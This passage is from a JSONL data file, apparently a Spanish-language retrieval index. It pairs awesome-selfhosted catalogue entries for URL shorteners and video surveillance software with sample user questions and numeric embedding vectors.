-0.02897, -0.04266, -0.00126, -0.12688, 0.08998, 0.04852, 0.01839, -0.11606, 0.00559, 0.01878, -0.00774, -0.1253, 0.06053, 0.00975, -0.09178, 0.01407, 0.05764, 0.00551, -0.1303, -0.00809, 0.02493, 0.07856, 0.0447, 0.04721, 0.08467, -0.03103, -0.0264, 0.05216, 0.07088, -0.00492, -0.03274, -0.08503, -0.0106, 0.03913, -0.14354, -0.03546, -0.0824, -0.00394, 0.03104, -0.01101, -0.06799, -0.156, -0.22762, -0.0333, -0.13343, -0.05345, 0.09696, -0.08434, -0.01213, 0.04229, -0.0235, 0.13179, -0.00104, 0.08891, 0.04054, -0.05287, -0.09438, 0.01671, -0.07815, -0.01513, -0.02444, -0.00913, -0.07168, 0.04307, -0.05624, 0.12068, -0.00382, -0.06669, 0.05797, 0.15113, -0.03089, 0.08624, 0.05793, 0.07661, -0.1335, 0.03297, -0.03813, 0.02755, 0.01822, -0.01999, 0.05856, 0.14901, -0.04569, 0.01038, -0.06724, -0.085, -0.0589, 0.07542, 0.04753, 0.04831, 0.07314, 0.10275, 0.04427, 0.17814, 0.0506, 0.00583, 0.06844, -0.06244, 0.09831, -0.04817, 0.03024, 0.05823, -0.1056, -0.09832, -0.13412, -0.05177, -0.06087, 0.00157, -0.0205, -0.03758, -0.04202, -0.03656, 0.01282, 0.04316, -0.07795, -0.02863, 0.01082, 0.05031, 0.01212, -0.0569, -0.06403, -0.00139, -0.0778, -0.03534, 0.03649, 0.04574, 0.00815, -0.02981, -0.01287, -0.04114, 0.07438, -0.02565, 0.04706, -0.05551, 0.02526, 0.07495, 0.00962, -0.09751, -0.03407, -0.05238, 0.00223, 0.11868, -0.04401, 0.03531, -0.03594, -0.04127, -0.0227, -0.10826, 0.05805, 0.16364, 0.0097, 0.02909, 0.03361, 0.02866, -0.03411, 0.03109, 0.01088, 0.06847, -0.00661, -0.01297, -0.033, 0.03879, -0.04824, -0.05837, 0.01506, -0.03513, -0.04906, -0.03374, 0.01746, 0.00252, -0.03621, -0.02854, -0.09414, 0.03368, -0.00026, -0.02325, 0.01976, -0.04717, -0.04301, -0.06304, 0.01429, -0.06965, -0.05374, 0.0711, 0.03604, -0.02327, -0.01633, 0.02061, 0.01388, -0.05927, -0.03634, -0.02688, 0.00273, -0.00186, -0.02096, 0.01677, 0.0056, 0.0454, -0.04131, 0.04957, 0.08314, -0.01842, 0.04864, -0.11018, -0.05013, -0.03997, 0.04347, -0.02355, -0.01878, 0.05059, 0.01251, 0.00097, 0.10323, -0.02853, 0.03467, 0.04025, 0.04075, 0.04184, 0.04068, 0.03244, -0.06164, 0.01512, -0.05566, -0.02154, 0.02475, -0.02785, -0.0224, -0.00311, -0.00552, -0.05811, 0.01052, 0.07073, -0.03416, -0.08297, -0.0391, -0.0474, -0.06164, 0.00929, 0.01909, -0.07719, 0.00224, 0.03487, 0.03171, -0.04565, 0.02269, -0.03859]} +{"tipo": "pregunta", "herramienta": "URL Shorteners", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / URL Shorteners", "tema": "url shorteners", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / URL Shorteners: bit β€” Fast, lightweight, resource-efficient, compiled URL shortener [MIT, Docker/Crystal]. Chhoto URL β€” Simple, lightning-fast URL shortener with no bloat (fork of simply-shorten) [MIT, Rust/Docker]. clink β€” A super-minimal link shortening service written in pure C, focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Flink β€” Create QR Codes, embeddable link previews for your website and crawls/scrapes metadata [MIT, Docker]. Kutt β€” Modern URL shortener with support for custom domains and custom URLs [MIT, Nodejs/Docker]. rs-short β€” Lightweight link shortener written in Rust, with features such as caching, spambot protection and phishing detection [MPL-2.0, Rust]. Shlink β€” URL shortener with REST API and command line interface. Includes official progressive web application and docker images [MIT, PHP/Docker]. Simple-URL-Shortener β€” KISS URL shortener, public or private (with account). Minimalist and lightweight. No dependencies [MIT, PHP].", "indexar": "cual es una alternativa libre a los servicios comerciales de URL Shorteners?", "v": [-0.07793, 0.02477, 0.01072, -0.07109, -0.18575, -0.11116, -0.01052, -0.05064, -0.1671, -0.02998, -0.14459, -0.25184, 0.07804, -0.05828, 0.07367, -0.10243, 0.07066, -0.16599, 0.1932, 0.01144, -0.03074, -0.01762, -0.08158, -0.00424, -0.11424, -0.09494, -0.01631, -0.11449, -0.11453, 0.1723, 0.07617, -0.03491, 0.02701, -0.01999, -0.04623, -0.01129, 0.10328, 0.10811, 0.14329, -0.08715, 0.12971, -0.11271, -0.06996, -0.02057, 0.02065, 0.01053, -0.10706, -0.00832, -0.07268, 0.06898, 0.01182, -0.05251, -0.17834, 0.01016, 0.10016, 0.06681, 0.04894, -0.00314, -0.10344, -0.05127, 0.02698, -0.02949, 0.01552, -0.03325, 0.08662, 0.00664, -0.05695, -0.0109, -0.04267, 0.00927, 0.00823, -0.02604, 0.06108, -0.04938, -0.07393, 0.05231, -0.06794, 0.04493, -0.04288, 0.08852, 0.09329, -0.07324, -0.05439, 0.09357, 0.01758, -0.03573, -0.02424, -0.08733, -0.02865, -0.00109, 0.10113, 0.08596, -0.07384, 0.04048, -0.01861, -0.01376, -0.04031, 0.04229, 0.02348, 0.10623, 0.02676, 0.10023, -0.10463, -0.01099, 0.06253, -0.00723, -0.05197, 0.00496, -0.09974, 0.02457, -0.00692, 0.01889, -0.00303, -0.0133, -0.01712, -0.01004, -0.10674, -0.03045, -0.00644, 0.03087, -0.02066, -0.09815, -0.01886, 0.01703, -0.04051, 0.07707, -0.00387, 0.01346, -0.00816, 0.028, 0.07803, -0.04597, -0.07145, -0.1075, -0.02014, -0.01967, 0.11527, -0.03767, 0.07552, 0.03712, -0.00846, -0.09142, -0.04587, 0.04251, 0.06812, -0.04388, 0.00935, -0.01865, 0.04586, 0.02011, -0.03853, 0.05587, -0.04093, 0.07817, -0.05359, 0.02172, -0.04246, -0.03622, 0.00456, 0.0785, 0.02051, 0.02958, 0.01814, -0.01886, 0.01342, -0.01941, -0.0249, -0.04124, -0.01634, 0.04704, 0.00233, 0.07463, 0.02137, -0.12066, 0.06932, 0.02238, -0.06486, -0.05041, 0.0788, -0.00688, 0.01027, -0.02785, -0.08302, 0.0351, -0.05084, -0.06663, -0.01651, 0.00795, 0.03399, -0.01675, -0.04851, -0.01902, -0.10937, -0.04072, -0.02313, 0.02743, -0.03547, -0.07257, -0.08261, -0.03124, -0.08252, -0.04454, -0.00048, 0.00419, -0.00854, 0.00487, 0.0234, 0.04796, -0.00307, 0.05864, -0.01489, 0.00776, 0.08152, -0.03159, -0.04595, -0.00949, 0.02645, -0.03778, 0.01243, -0.01676, 0.01547, -0.00045, -0.01669, -0.01617, -0.02804, -0.01286, 0.04655, 0.06539, -0.03443, 0.00059, -0.01288, 0.0077, 0.00193, 0.0195, 0.00998, -0.04147, -0.01521, 0.02399, 0.02929, -0.01812, 0.08565, 0.05598, -0.05188, -0.03169, 0.02958, 0.00101, -0.06812, -0.0081, -0.0489, -0.03479, -0.05607, 0.01454, -0.0145, 0.00717, 0.07132, 0.01287]} +{"tipo": "pregunta", "herramienta": "URL Shorteners", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / URL Shorteners", "tema": "url shorteners", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / URL Shorteners: YOURLS β€” YOURLS is a set of PHP scripts that will allow you to run Your Own URL Shortener. Features include password protection, URL customization, bookmarklets, statistics, API, plugins, jsonp [MIT, PHP].", "indexar": "que programa para mi propio servidor sirve para acortar URLs?", "v": [-0.05011, -0.04462, -0.1454, -0.14553, -0.00609, -0.18498, 0.067, -0.13787, 0.05185, -0.01445, -0.07291, -0.08321, 0.16376, -0.18199, -0.03719, -0.0212, 0.14126, -0.1617, 0.12608, 0.13247, 0.03833, 0.11444, 0.06018, -0.09267, -0.14329, 0.03974, 0.08385, -0.08741, -0.07649, -0.01189, 0.0214, 0.00553, 0.02986, -0.05907, -0.02399, -0.06672, 0.01555, 0.12462, -0.05011, 0.06181, 0.08701, -0.03804, -0.02179, 0.04888, 0.03316, -0.03036, 0.0924, -0.12713, 0.05664, 0.00805, -0.02597, -0.10063, -0.01966, 0.06054, -0.029, 0.0084, -0.04793, -0.21523, -0.00802, 0.01399, -0.11041, -0.08881, -0.00794, -0.05635, 0.06667, -0.0042, 0.00903, -0.00307, -0.08629, -0.09612, -0.1274, 0.04546, 0.06892, -0.11792, 0.00064, 0.04891, -0.00512, -0.01507, 0.08385, -0.02874, 0.02261, 0.01834, -0.05289, 0.1781, -0.03337, 0.01409, -0.00113, -0.01874, 0.09074, 0.00242, -0.01093, 0.10012, -0.05376, 0.08909, 0.01314, -0.11455, 0.12335, 0.01107, 0.06471, 0.07861, 0.08828, -0.02406, -0.0591, 0.05713, -0.00925, 0.11117, 0.10314, -0.05376, -0.0031, 0.06431, 0.04957, -0.00801, -0.10991, -0.01725, -0.07927, -0.03627, -0.04265, 0.0089, 0.05192, -0.03067, -0.08519, -0.04434, -0.00633, 0.05038, 0.00941, -0.00037, 0.04677, 0.03301, -0.02864, 0.02131, -0.00145, -0.01184, -0.01785, -0.04101, 0.00531, -0.00834, 0.09089, -0.06964, -0.06652, -0.02303, 0.02685, 0.03671, -0.02865, 0.02891, 0.06738, -0.01901, 0.08395, -0.06653, 0.01526, 0.0408, 0.00279, 0.0017, -0.02011, -0.02367, -0.13417, -0.0564, 0.00771, -0.03271, -0.06069, 0.02778, -0.03776, 0.0145, 0.046, 0.02249, 0.04646, 0.0042, -0.00035, 0.03959, 0.08546, 0.12562, -0.04202, 0.07147, -0.00127, -0.09189, 0.00148, -0.01187, -0.0573, -0.05222, 0.02102, 0.04261, -0.0415, -0.00247, 0.03725, 0.02209, -0.03876, -0.06198, -0.0056, 0.0266, 0.00044, -0.03411, 0.01275, -0.06181, -0.04962, 0.01957, 0.03808, 0.00115, -0.03551, -0.05408, -0.02778, -0.04234, -0.03492, -0.01522, -0.01488, 0.00727, 0.00971, 0.04872, 0.01117, -0.01522, 0.04349, 0.08054, -0.00562, -0.01032, 0.12686, 0.01271, -0.01748, -0.02345, 0.07422, 0.00976, 0.06302, 0.00542, 0.00016, -0.00215, -0.02708, 0.04059, 0.02566, -0.00552, 0.01016, -0.02324, 0.0411, -0.0214, -0.04745, -0.04167, -0.04707, -0.0368, 0.02328, -0.05644, 0.00032, -0.01349, 0.008, -0.07547, -0.04444, 0.05048, -0.02322, -0.09491, -0.01001, -0.04973, -0.00958, -0.05725, -0.03702, 0.03771, -0.02922, -0.05616, 0.01475, -0.03237, 0.03366, 0.03336]} +{"tipo": "pregunta", "herramienta": "URL Shorteners", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / URL Shorteners", "tema": "url shorteners", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / URL Shorteners: YOURLS β€” YOURLS is a set of PHP scripts that will allow you to run Your Own URL Shortener. Features include password protection, URL customization, bookmarklets, statistics, API, plugins, jsonp [MIT, PHP].", "indexar": "hay alguna alternativa libre a los servicios de acortamiento de enlaces?", "v": [-0.02687, 0.14567, -0.08638, -0.0881, -0.01997, -0.02871, 0.01632, -0.10871, -0.20637, -0.06552, -0.1108, -0.24789, -0.01958, 0.00145, 0.23494, 0.0026, 0.11826, -0.13231, 0.06067, -0.01517, -0.07471, -0.00598, -0.13654, 0.02059, -0.12938, -0.1394, 0.07334, 0.02153, -0.05885, 0.02903, -0.01276, -0.01527, 0.00416, 0.02972, -0.02034, 0.01777, 0.17281, 0.02586, 0.1678, -0.12205, -0.04703, -0.0863, -0.0613, 0.04288, -0.10495, -0.00474, -0.12258, 0.01403, -0.00589, -0.02758, -0.00541, -0.11158, -0.11328, -0.02522, -0.01861, 0.03719, 0.1082, -0.04273, -0.08405, -0.08411, -0.04416, 0.07961, -0.00998, -0.00683, 0.08496, 0.03204, -0.03164, 0.01305, -0.03359, 0.06541, -0.03281, -0.02555, 0.04779, -0.01128, -0.10116, 0.02444, 0.0371, 0.01416, 0.00123, 0.10107, -0.03644, 0.02452, 0.07241, -0.02021, -0.09639, 0.007, 0.00879, -0.05023, -0.02186, -0.05568, 0.10152, 0.12111, -0.02448, 0.10774, -0.12948, -0.07283, -0.01895, 0.08017, 0.09958, 0.02524, 0.1401, 0.12091, -0.01287, 0.0166, 0.01127, -0.04154, 0.03683, -0.01536, -0.05148, 0.02614, 0.04593, 0.04669, 0.02019, -0.09858, -0.07968, -0.03422, -0.03468, -0.02293, 0.02649, -0.01296, -0.02894, -0.09068, -0.01817, -0.00788, -0.10404, 0.01656, 0.06991, 0.03534, -0.01641, 0.01417, 0.02606, -0.03705, -0.10375, -0.11041, -0.0253, -0.03092, 0.10608, 0.00945, 0.07242, -0.03154, 0.0093, 0.00274, -0.0152, 0.00181, -0.02391, -0.06736, 0.02917, -0.04561, -0.0449, -0.06767, -0.04202, 0.01912, -0.06377, 0.0773, -0.02387, 0.01605, -0.05877, -0.0358, -0.02606, 0.09438, 0.01567, -0.00249, 0.00765, 0.03966, -0.0296, 0.06887, 0.05108, 0.0122, -0.05249, 0.06542, -0.043, 0.12837, 0.01001, -0.06931, 0.04679, -0.03156, -0.02771, -0.05728, 0.0412, -0.00264, 0.0145, -0.02528, -0.10367, 0.03369, -0.01554, -0.04269, 0.0281, -0.01983, 0.01242, -0.02909, -0.02837, -0.054, -0.0813, -0.00856, 0.03312, -0.00571, -0.02813, -0.04839, -0.03091, -0.01998, -0.07229, -0.03867, 0.01402, -0.01002, -0.06154, 0.02191, 0.0073, 0.01568, -0.00998, 0.07855, 0.04713, -0.02104, 0.07931, -0.02442, -0.09542, -0.0087, 0.0625, -0.01973, 0.01785, 0.04125, 0.02134, -0.0004, -0.02501, 0.03696, 0.03668, 0.05349, 0.04167, 0.03491, -0.02264, 0.05552, 0.03202, -0.01983, -0.02891, -0.02658, -0.02976, -0.03669, -0.00052, 0.01334, -0.00504, 0.00609, 0.05436, 0.04963, -0.02979, -0.00766, 0.00027, -0.01275, -0.0734, -0.03339, 0.03305, -0.05344, -0.00475, 0.02714, -0.02271, -0.02237, 0.02809, 0.02773]} +{"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Bluecherry β€” Closed-circuit television (CCTV) software application which supports IP and Analog cameras [GPL-2.0, PHP]. Frigate β€” Monitor your security cameras with locally processed AI [MIT, Docker/Python/Nodejs]. motionEye β€” Online interface for the software Motion, a video surveillance program with motion detection [GPL-3.0, Python/Docker]. Secluso β€” Private DIY home security camera system for Raspberry Pi, with end-to-end encrypted remote access and mobile apps for live video, alerts, and recording playback [GPL-3.0, Rust]. SentryShot β€” Video surveillance management system [GPL-2.0, Docker/Rust]. Strix β€” Auto-discovers working stream URLs for IP cameras and generates ready-to-use Frigate and go2rtc configs [MIT, Go/Docker]. Viseron β€” Self-hosted, local-only NVR and AI Computer Vision software. With features such as object detection, motion detection, face recognition and more, it gives you the power to keep an eye on your home, office or any other place you want to monitor [MIT, Docker].", "indexar": "que programa hay para monitorizar cΓ‘maras de seguridad con detecciΓ³n de movimiento?", "v": [0.1725, 0.00665, -0.0839, -0.22888, -0.02763, -0.11107, -0.13023, 0.05144, 0.03854, -0.05601, 0.02433, -0.03354, -0.04462, -0.02667, 0.04451, 0.06977, 0.07927, -0.04887, 0.00301, 0.00401, 0.01269, -0.00952, 0.00342, -0.06277, 0.06167, 0.10097, -0.06566, -0.04746, -0.07205, -0.11491, -0.00425, -0.04993, 0.10428, 0.00082, -0.05109, -0.17632, 0.07001, -0.07399, 0.04191, 0.08152, -0.06878, -0.02781, 0.03303, -0.0635, 0.11065, -0.01198, -0.01292, -0.02778, 0.0563, -0.1001, -0.02693, 0.14885, -0.01333, -0.03486, -0.00026, -0.1212, -0.00752, 0.07874, 0.04008, -0.13473, -0.01991, 0.05794, 0.05176, -0.00135, -0.0181, -0.00736, 0.08827, -0.00662, -0.13122, -0.04464, 0.00682, -0.00307, -0.00956, 0.1281, 0.00068, -0.03832, -0.03842, -0.07321, 0.02196, 0.0005, -0.11361, 0.05244, -0.05263, 0.11779, -0.12247, -0.12093, -0.02502, -0.07018, -0.07155, -0.03104, 0.07763, 0.17644, 0.00136, 0.06507, 0.1024, 0.02551, 0.10198, 7e-05, -0.05926, 0.07154, 0.11663, -0.11593, -0.09719, 0.06232, 0.01478, 0.02386, 0.04271, 0.02851, -0.06623, -0.04895, 0.00691, 0.06949, -0.06479, -0.07884, -0.09752, 0.01796, -0.03692, -0.03854, 0.03193, -0.00157, -0.02788, -0.01678, -0.06782, -0.14894, 0.11909, -0.05949, -0.03049, 0.05508, -0.0806, 0.03956, 0.05125, -0.05068, -0.06383, -0.03112, -0.04738, -0.04099, 0.01186, -0.02295, -0.03796, -0.05627, 0.01881, 0.01334, 0.07846, -0.04753, 0.07079, 0.02915, 0.02264, 0.04129, -0.08266, 0.14054, -0.01214, 0.05146, -0.03815, -0.02894, -0.0079, 0.10175, -0.00423, -0.03472, -0.06161, 0.00613, 0.04389, -0.0282, -0.01886, -0.02411, 0.04797, -0.0149, -0.00465, 0.00023, 0.08231, 0.00655, -0.00509, 0.03699, 0.03136, -0.0436, -0.01513, 0.01237, -0.05465, -0.11627, 0.03211, -0.09046, -0.07571, 0.13366, 0.06939, 0.03576, 0.08493, 0.00011, 0.00448, 0.05386, 0.04641, 0.05324, 0.03557, -0.00203, -0.04516, -0.01279, -0.00495, -0.07272, -0.05338, -0.01595, 0.05201, 0.03023, -0.07349, -0.01112, 0.01646, -0.01062, 0.02932, 0.04874, -0.03391, 0.04013, 0.07186, -0.02988, 0.00555, 0.0104, 0.02898, -0.00517, -0.0575, 0.01449, 0.03145, 0.07753, -0.06239, 0.0295, 0.0599, -0.02979, -0.0038, 0.06795, -0.03784, -0.08605, 0.00659, 0.09774, 0.03908, -0.07751, -0.00586, 0.01227, -0.07456, -0.05219, -0.00441, -0.0206, 0.01881, -0.02024, -0.00148, -0.0728, -0.04197, -0.00177, -0.05867, -0.03404, -0.05072, -0.01922, -0.02745, 0.04312, 0.05616, -0.07076, 0.0325, 0.0234, 0.01421, -0.06481, 0.05436, -0.01305]} +{"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Bluecherry β€” Closed-circuit television (CCTV) software application which supports IP and Analog cameras [GPL-2.0, PHP]. Frigate β€” Monitor your security cameras with locally processed AI [MIT, Docker/Python/Nodejs]. motionEye β€” Online interface for the software Motion, a video surveillance program with motion detection [GPL-3.0, Python/Docker]. Secluso β€” Private DIY home security camera system for Raspberry Pi, with end-to-end encrypted remote access and mobile apps for live video, alerts, and recording playback [GPL-3.0, Rust]. SentryShot β€” Video surveillance management system [GPL-2.0, Docker/Rust]. Strix β€” Auto-discovers working stream URLs for IP cameras and generates ready-to-use Frigate and go2rtc configs [MIT, Go/Docker]. Viseron β€” Self-hosted, local-only NVR and AI Computer Vision software. With features such as object detection, motion detection, face recognition and more, it gives you the power to keep an eye on your home, office or any other place you want to monitor [MIT, Docker].", "indexar": "con quΓ© puedo montar un sistema de vigilancia local que funcione en Raspberry Pi?", "v": [-0.01623, 0.01257, -0.23159, -0.16152, 0.0024, -0.12697, 0.04044, -0.11958, -0.08398, -0.16056, 0.14175, -0.11312, 0.13112, -0.01561, 0.17823, -0.03888, -0.13604, -0.00318, 0.09255, -0.02821, -0.14258, -0.10648, -0.01853, 0.08309, 0.06827, 0.11467, 0.118, -0.04686, -0.11188, 0.02337, 0.1637, 0.04078, 0.01557, -0.06524, -0.15412, -0.00571, -0.01574, -0.02588, 0.11166, -0.07031, 0.0418, -0.08553, -0.02557, -0.00033, 0.04406, -0.01293, 0.12972, -0.06753, 0.03903, 0.04232, -0.11847, 0.00038, -0.10462, -0.01656, -0.00781, 0.01075, 0.07753, -0.09111, 0.15823, 0.02381, -0.08496, 0.00632, -0.01526, -0.02557, 0.02784, -0.10707, -0.04123, -0.02971, -0.09044, 0.05305, -0.06385, -0.07429, 0.00855, 0.04285, 0.02167, 0.04736, -0.0257, -0.0129, 0.12829, 0.00392, -0.01349, -0.00331, -0.0483, 0.05464, 0.00013, -0.07573, -0.01061, -0.12904, 0.00034, 0.03501, 0.01396, 0.07785, 0.09805, 0.0674, 0.07637, 0.04002, 0.05775, 0.10339, 0.00391, -0.02584, -0.01189, -0.00501, -0.08777, 0.05212, 0.07261, -0.04892, 0.06639, 0.08273, 0.09211, -0.04819, 0.00137, 0.03988, -0.14086, -0.01363, -0.13135, -0.08969, -0.07728, 0.07943, 0.01125, 0.02073, 0.00596, 0.01743, 0.01723, -0.03502, 0.03931, 0.05519, -0.0348, 0.06998, -0.01592, -0.01085, 0.02615, -0.08773, 0.02064, 0.01878, 0.00712, -0.02346, -0.00689, -0.01427, -0.09178, 0.06297, 0.00126, -0.00143, 0.08961, -0.08262, 0.03959, 0.02802, 0.04662, -0.03325, 0.01587, -0.00156, -0.01878, 0.06231, -0.03682, -0.0127, -0.02199, 0.00091, 0.04462, -0.02914, 0.03457, 0.05091, 0.04487, -0.01535, -0.03973, 0.0273, -0.00462, -0.02772, 0.003, 0.00907, 0.06549, 0.026, -0.06177, 0.01357, -0.01074, -0.08999, 0.01399, -0.03574, -0.10055, -0.0465, 0.02796, -0.02755, -0.02618, 0.10775, -0.01168, 0.04871, 0.0246, 0.03857, -0.01258, 0.05592, -0.0086, 0.02165, 0.09883, 0.00971, 0.03102, -0.01722, 0.06208, -0.02248, -0.00955, -0.10151, 0.0219, 0.02235, -0.0478, 0.00233, 0.0025, 0.0173, 0.01227, 0.01019, 0.04493, 0.04984, 0.0289, 0.02461, 0.01758, 0.02542, 0.05422, -0.01124, -0.03867, 0.00925, -0.04048, 0.00379, -0.01269, -0.02321, 0.05481, 0.00295, 0.01965, 0.07756, -0.0516, -0.02702, -0.01658, 0.0832, 0.01488, 0.03076, -0.04834, -0.04171, 0.02239, 0.00309, -0.02365, -0.09023, 0.00073, 0.05212, -0.0149, -0.04596, 0.03808, 0.0887, 0.00848, -0.05473, -0.07, -0.06358, -0.03697, 0.02003, 0.00832, -0.0693, -0.02573, 0.01148, -0.02673, -0.0541, -0.0091, -0.00998]} +{"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Bluecherry β€” Closed-circuit television (CCTV) software application which supports IP and Analog cameras [GPL-2.0, PHP]. Frigate β€” Monitor your security cameras with locally processed AI [MIT, Docker/Python/Nodejs]. motionEye β€” Online interface for the software Motion, a video surveillance program with motion detection [GPL-3.0, Python/Docker]. Secluso β€” Private DIY home security camera system for Raspberry Pi, with end-to-end encrypted remote access and mobile apps for live video, alerts, and recording playback [GPL-3.0, Rust]. SentryShot β€” Video surveillance management system [GPL-2.0, Docker/Rust]. Strix β€” Auto-discovers working stream URLs for IP cameras and generates ready-to-use Frigate and go2rtc configs [MIT, Go/Docker]. Viseron β€” Self-hosted, local-only NVR and AI Computer Vision software. With features such as object detection, motion detection, face recognition and more, it gives you the power to keep an eye on your home, office or any other place you want to monitor [MIT, Docker].", "indexar": "quΓ© alternativa libre a los sistemas comerciales de CCTV existe hoy en dΓ­a?", "v": [-0.116, 0.05296, -0.08712, -0.06185, -0.12992, -0.18562, -0.0424, 0.00086, -0.17518, -0.0115, -0.02438, -0.18141, -0.07191, 0.00938, 0.10194, -0.04216, 0.04364, -0.1393, 0.11899, -0.12744, -0.07336, -0.09069, -0.05749, -0.05474, -0.01053, 0.02078, -0.03873, -0.11982, -0.08522, 0.10497, 0.08081, -0.00569, 0.0872, 0.06371, -0.04417, -0.01356, 0.06212, -0.0144, 0.01157, -0.10247, 0.14721, -0.13822, -0.00357, 0.02488, 0.14748, -0.02522, -0.05479, -0.05158, -0.06463, -0.08766, -0.08964, -0.01928, -0.06063, -0.00856, 0.15707, 0.02905, -0.1153, 0.05311, 0.03253, -0.13753, 0.03181, 0.15587, 0.04089, -0.12216, 0.03564, 0.04391, -0.07468, 0.00789, -0.04806, 0.08302, -0.04751, -0.08757, 0.02069, 0.04383, 0.00294, -0.01054, -0.02749, 0.04948, -0.05576, 0.02972, -0.00038, -0.0081, 0.0082, 0.03265, 0.02217, -0.04529, 0.06571, -0.01032, -0.07154, -0.01147, 0.08717, 0.10822, 0.00515, 0.08549, 0.11059, -0.00903, -0.05284, 0.03341, -0.02471, 0.07541, -0.0037, 0.05896, -0.09468, -0.05834, -0.05046, -0.06292, 0.00351, -0.01105, -0.00586, -0.06484, -0.02756, 0.02681, 0.02304, -0.01075, 0.02378, -0.00319, 0.02542, 0.04359, -0.10582, 0.07747, -0.04232, -0.00536, 0.02089, -0.00082, 0.03033, -0.0287, 0.06286, 0.08706, -0.08545, 0.05438, 0.00873, -0.02538, -0.04745, -0.06802, -0.00828, 0.04844, 0.03907, -0.02844, -0.0693, 0.03613, -0.02943, 0.03097, -0.06907, -0.04894, 0.08509, 0.00369, 0.01863, -0.116, -0.03054, -0.01779, -0.07181, 0.04322, -0.10026, 0.05869, 0.04364, 0.06581, 0.02803, -0.0458, -0.03379, 0.10548, 0.02363, -0.01666, -0.06208, 0.01679, -0.01544, -0.0217, -0.02626, 0.02159, -0.05421, 0.09378, 0.01316, 0.11686, 0.08928, -0.12784, 0.05627, -0.02446, -0.00822, -0.06409, 0.01, -0.03564, -0.02605, 0.02216, -0.02084, 0.00976, -0.01835, -0.04495, -0.03855, 0.01399, -0.02372, -0.01371, 0.00546, 0.05201, -0.09208, -0.08433, -0.06581, 0.00493, 0.00717, -0.0498, -0.03131, 0.03348, -0.10197, -0.02819, 0.11401, -0.04872, -0.03787, 0.04486, 0.06257, 0.07161, 0.07732, 0.04373, -0.02363, -0.00307, -0.0119, -0.08248, -0.07469, 0.02095, 0.01796, 0.06495, -0.01112, -0.08447, 0.03993, 0.02053, 0.02081, -0.01049, -0.03388, 0.00307, -0.01213, 0.09434, -0.02392, -0.02211, -0.03038, -0.03045, 0.06261, 0.00013, -0.00017, -0.01362, -0.00542, -0.00139, 0.0193, -0.00478, 0.06704, 0.0906, -0.0702, -0.01316, -0.03004, 0.00789, -0.08539, -0.02303, -0.04835, -0.05352, -0.04664, 0.00312, -0.01676, 0.02745, 0.06333, -0.03055]} +{"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Zoneminder β€” Closed-circuit television (CCTV) software application which supports IP, USB and Analog cameras [GPL-2.0, PHP/deb].", "indexar": "que programa puedo usar para montar un sistema de vigilancia con cΓ‘maras analΓ³gicas?", "v": [0.16015, 0.03341, -0.19844, -0.12416, -0.09652, -0.06697, -0.01239, -0.05621, -0.0535, -0.1045, -0.00404, -0.11288, -0.02292, 0.00829, 0.03952, 0.08408, 0.00813, -0.12219, 0.02685, 0.01883, -0.04996, -0.06734, -0.03014, -0.10763, -0.02212, 0.12628, 0.05434, -0.1502, -0.07065, -0.07013, 0.05718, 0.03761, 0.09701, -0.02364, -0.06181, -0.1018, -0.01042, -0.09991, 0.11706, 0.03645, 0.01182, -0.05019, 0.04524, -0.05813, 0.11412, -0.04137, 0.02847, -0.07445, -0.02876, -0.08492, -0.05445, 0.05512, -0.06237, 0.02941, 0.02471, -0.15444, 0.05128, -0.02985, -0.01571, -0.01971, 0.00572, 0.12069, 0.09622, 0.0577, 0.01509, 0.03795, 0.00439, -0.00558, -0.13809, -0.03798, -0.0475, -0.05282, 0.04369, 0.07402, -0.05089, -0.00404, -0.03516, -0.064, 0.05537, -0.04155, -0.10836, -0.02179, -0.05656, 0.14242, -0.075, -0.07092, -0.01664, -0.05012, -0.07801, -0.04841, 0.05017, 0.10619, 0.06922, -0.03216, 0.15879, -0.04621, 0.10628, 0.08465, -0.01348, -0.00499, 0.07456, -0.10956, -0.08111, 0.15528, -0.04484, -0.00347, 0.08394, -0.03104, -0.00338, -0.06904, -0.01636, 0.04599, -0.11255, -0.06254, -0.14396, -0.03054, -0.00937, -0.00898, 0.04543, -0.03597, 0.00917, 0.0524, -0.0426, -0.08923, 0.1557, -0.04142, 0.00254, 0.07249, -0.06336, 0.04763, -0.02611, -0.06372, -0.04929, 0.00425, -0.01327, -0.05149, -0.02708, 0.00685, -0.09365, 0.01892, -0.02975, 0.03251, 0.03008, -0.11671, 0.06017, 0.04395, -0.01959, -0.06095, -0.01909, 0.04666, 0.01364, 0.09793, -0.06531, 0.02091, -0.02405, 0.01023, 0.07843, -0.10739, -0.02976, 0.0126, 0.03177, -0.04201, -0.02816, -0.03166, 0.09266, -0.04834, -0.00182, -0.03868, 0.02904, 0.05432, -0.01034, 0.0328, 0.04074, -0.01475, 0.02647, -0.02941, -0.0608, -0.10041, 0.01455, -0.05577, -0.09969, 0.1212, 0.05628, 0.03887, 0.03876, 0.01774, -0.00103, 0.09676, 0.00697, 0.02144, 0.04293, 0.025, 0.04019, 